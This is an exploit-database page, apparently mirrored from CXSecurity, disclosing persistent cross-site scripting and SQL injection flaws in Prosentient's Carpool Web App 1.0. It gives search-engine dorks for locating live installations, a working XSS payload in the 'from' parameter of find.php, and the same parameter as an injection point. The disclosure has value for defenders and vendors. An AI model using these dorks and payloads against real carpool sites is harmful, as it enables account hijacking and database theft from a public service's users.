Carpool Web App 1.0 Cross Site Scripting / SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1650539 漏洞类型
发布时间 2019-07-01 更新时间 2019-07-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070005
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 

# Exploit Title: Carpool Web App  Persistent Cross-Site Scripting - Sql Injection Vulnerability 
# Date: 29/06/2019
# Url Vendor: http://www.prosentient.com.au/
# Vendor Name: Prosentient
# Version: 1.0
# Author: TaurusOmar  
# Tiwtter: @TaurusOmar_
# Email: servicios@taurusomar.com
# Home:  https://taurusomar.com/
# Tested On: Parrot Security OS
# Risk: Medium
# Dork: intext:"Powered by Prosentient Systems"
# Dork: intext:"COPYRIGHT © 2015 CCAI & DPTI"

# Carpool systems

Carpool by Prosentient Systems is an efficient and eco-friendly system that connects drivers and passengers to save money, make new acquaintances and help the environment. This service was first commissioned to meet the needs of the NSW Ministry of Transport. But we are experts at hosting both corporate and government systems. It is a practical way of sharing transport costs and reducing road congestion and vehicle pollution, and is already operating in a number of local government areas in Australia, and is also available in the United Kingdom. 

---------------------------------
+      CROSS SITE SCRIPTING     + 
---------------------------------
# Exploiting Description - Persistent Cross-Site Scripting 
http://site.com/find.php?from=">><img src=x onerror=confirm("TaurusOmar")>


# Proof Concept
https://i.imgur.com/kYd9xHX.png

------------------------
+    SQL INJECTION     +
------------------------
# Exploiting Description - Sql Injection  
http://site.com/find.php?from= [Sqli]

#Proof Concept
https://i.imgur.com/A9kFXy2.png